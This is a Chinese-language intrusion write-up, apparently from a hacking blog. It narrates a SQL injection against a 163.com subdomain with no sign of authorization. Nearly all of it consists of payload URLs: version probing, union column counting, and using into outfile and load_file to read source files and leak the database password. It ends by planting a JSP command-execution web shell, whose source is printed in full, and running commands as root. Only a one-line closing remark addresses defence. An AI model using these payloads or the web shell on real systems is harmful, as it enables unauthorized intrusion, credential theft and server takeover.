|
|
|
|
163.com是國內一家比較出名的門戶網站,提供包括郵箱等等在內的各種服務,這樣繁多的服務,不知道會不會在哪些地方存在漏洞哦!正好最近學習了一些注入知識就想對這些門戶網站做點小小的安全檢測,不知道他們的腳本像不像他們名聲一樣那么厲害哦!
廢話就不說了,我們就去找那些傳遞參數的頁面看看會不會不小心有那么一個參數沒有過濾,那么我們就有空子可以鉆了哦!網易的腳本基本上是采取的jsp和Php的形式,主站看樣子是靜態的,就不說了,其他的站那么多的jsp和php應該有問題吧!Php注入也被人研究爛了,注入的時候被Php的那個特性攔著也相當的不舒服,所以干脆就去找jsp的腳本,希望能找到一些沒有過濾的參數。找了能打兩把CS的工夫還真讓我找到一個頁面http://XXX.163.com/wap/content.jsp?id=120,哈哈,看來是個數字類型的變量哦!就喜歡沒有過濾的數字類型變量,因為如果能注入的話基本上沒有什么阻礙!我們來看看能不能注入吧!提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=1
返回正常哦,如圖1
接著提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2
返回一堆的jsp錯誤,如圖2,
還搞到了web的路徑,幸福!通過路徑我們還知道這個系統是Linux類系統哦。
根據上面的兩個推測很有可能這就是一個注入點啦!因為我們提交的and 1=1和and 1=2被當作Sql代碼執行啦!如果參數沒有做其他過濾的話,我們就可以在這里提交我們的注入代碼啦!那么繼續看看吧!因為jsp可以和很多數據庫搭配,所以這里我們還是先來看看是什么數據庫吧!提交:
http://XXX.163.com/wap/content.jsp?id=120/*劍心
返回結果如圖3
,看來是支持/*注釋了,支持/*注釋的在這里就應該是mysql數據庫了!既然知道了是mysql數據庫,那么就來看看系統的版本吧,如果在4.0以上對猜表和注入是很有幫助的哦!提交:
http://XXX.163.com/wap/content.jsp?id=120 and ord(mid(version(),1,1))>51/*
返回正常的結果,看來是大于4.0版本的啦,也就是支持union查詢的啦!因為這里語句的作用是取出版本的第一個字符,是大于3的,其中51是3的ASCII字符!既然支持union查詢我們就開看看字段的個數吧!提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1/*
返回錯誤如圖4
繼續提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2/*
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3/*
……
到http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,6,7,8,9,10/*
的時候返回正常結果如圖5
,看來是10個字段并且哪些字段會在頁面顯示也出來了!嘿嘿,現在能union查詢了,就總的看下數據庫的信息吧!提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,user(),database(),8,9,version()/*
返回結果如圖6
,我們知道了數據庫名字以及用戶連接的名字以及數據庫具體版本了哦!那么下一步該怎么做呢?看看用戶那么特殊,這個用戶很可能是管理員之類的角色哦!還是先看看權限夠不夠大,關鍵是能不能讀寫文件!提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,user(),database(),8,9,10 into outfile '/tmp/jnc.txt'/*
嘿嘿,注意這里跟Php的注入不同,jsp不會對提交的任何字符做轉義處理哦!所以我們放心的提交就行了,從上面的例子中我們大約知道系統是Linux類的,所以寫文件到/tmp/jnc.txt中,這個目錄一般都是可寫的。然后再提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,user(),database(),8,9,load_file('/tmp/jnc.txt')/*
分別返回如圖7
圖8
,看來是寫文件和讀文件都成功了!有File權限哦,在jsp環境下不受php下那種特性的影響可以在權限允許的范圍之內隨便寫文件!既然權限有了,來判斷下web和Mysql服務器是不是一個主機吧,是的話又可以免去猜測密碼的痛苦了!web路徑出來了那么我們就讀web服務器上存在的文件,如果存在的話就應該是一個主機啦!提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,user(),database(),8,9,load_file('/home/project/web163/web/content.jsp')/*
讀取我們的content.jsp,哈哈,如圖9
,成功返回啦!然后再讀了幾個文件都成功返回,說明是一個服務器哦!既然這樣就客氣啦!繼續讀吧!我們感興趣的東西當然是密碼了!查看剛才返回的源文件,我們發現里面包含了Function.jsp,于是去讀Function.jsp的內容,提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,user(),database(),8,9,load_file('/home/project/web163/web/function.jsp')/*
返回結果如圖10
,哈哈,看源文件得到了密碼哦!得到了密碼我們就去連接試試吧!打開自己的Mysql客戶端連接上去,輸入得到的密碼結果如圖11
Mysql拒絕了其他IP的登陸!雖然不能連Mysql但是我們不是已經有個注入點了么?還能寫文件和讀文件呢,那么就、從腳本上繼續前進吧!
既然知道了web路徑,又能寫文件,那么能不能用into outfile導出一個webshell呢?試試吧!提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 into outfile '/home/project/web163/web/jnc.jsp'/*
但是結果很另人郁悶,寫到/tmp/下就好用,寫到web目錄下不行,試了很多次都是這個結果,看來是權限的原因了!Linux很大的一個優點就是權限設置得很好,默認只有創建者才有權限修改文件,我們用的用戶是Mysql的,當然不能在apache的目錄下建立文件了!到這里入侵遇到了第一個阻礙,并且暫時沒有辦法解決!
我們是搞腳本安全的,一條路不行就還是回到腳本上來吧!去根目錄加了個/admin提示403Forbiden錯誤,哈哈,這個是管理目錄了!于是興沖沖的提交login.jsp和login.html以及所有我覺得可能的后臺登陸文件,但服務器都無情的給我一個404錯誤,那個郁悶喲!想從其他的后臺得到點啟示,猜測出后臺的登陸路徑,但是還是找不到后臺的登陸文件,這條路也死在這里了!
到這里應該停下來想想了!聽了會周杰倫的歌,忽然想到,Linux服務器本身是很安全的,但是不知道會不會存在人為的安全漏洞呢?我在一些其他的大點的網站上經常看到除了一些常用的目錄之外,管理員還設置了test目錄方便其他管理員調試腳本,并且這個目錄的權限通常是設置成777的,也就是說Everyone可讀可寫的,如果存在這樣的目錄的話就......馬上去網站上提交:
http://XXX.163.com/test/
404不存在
http://XXX.163.com/wap/test/
403 Forbidden,哈哈,真是CS暴頭的感覺,居然存在啊!馬上去提交:
http://XXX.163.com/wap/content.jsp?id=120 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 into outfile '/home/project/web163/web/test/jnc.txt'/*
等到返回錯誤的時候去訪問http://XXX.163.com/wap/test/jnc.txt如圖12
,哈哈,存在啊!看來真讓我發現一個人為的安全隱患啊!這就是經驗了!好了,可以導出為txt文件,那么導出成Php文件如何呢?去寫了一個一句話木馬導出成php文件,訪問這個Php文件居然提示下載,看來web目錄只支持jsp后綴的啦,那么我們只能導出成jsp文件了!于是馬上去找jsp后門,找來找去找到個最短的如下:
就是能執行個命令,執行形式是在Url里訪問jnc.jsp?cmd=命令,因為我們是用into outfile導文件并且是在union查詢里用的,所以要導出的內容必須在union的最后面,否則是不能得到我們結果的哦,在導之前我們還要將jsp的語句寫到一行,不影響jsp的執行但是方便我們導出嘛!再看看,發現字符好象太長,Get可能滿足不了要求,于是干脆自己寫個Html吧!內容如下:
<BR><BR><%@ page import="java.io.*" %><BR><%<BR>try {<BR>String cmd = request.getParameter("cmd");<BR>Process child = Runtime.getRuntime().exec(cmd);<BR>InputStream in = child.getInputStream();<BR>int c;<BR>while ((c = in.read()) != -1) {<BR>out.print((char)c);<BR>}<BR>in.close();<BR>try {<BR>child.waitFor();<BR>} catch (InterruptedException e) {<BR>e.printStackTrace();<BR>}<BR>} catch (IOException e) {<BR>System.err.println(e);<BR>}<BR>%><BR>
然后提交欄里寫上:
120 and 1=2 union select 1,2,3,4,5,6,7,8,9,'寫在一行的木馬語句' into outfile '/home/project/web163/web/test/jnc.jsp'/*,如圖13
,點提交之后我們去test目錄看看,哈哈,我們的木馬真的存在啦!提交:
http://XXX.163.com/wap/test/jsp3.jsp?cmd=id
返回結果如圖14
,哈哈居然是用Root啟動的,權限是最大的啦!省得我們提權了!到此,對163.com的一次安全檢測結束了!
通過上面的例子我們可以看到,盡管是小小的一個參數沒有過濾,加上一些其他的安全原因,導致的結果可能就是服務器的淪陷,不僅僅是163.com的管理員要注意這個,希望所有的管理員都注意這個。
|
|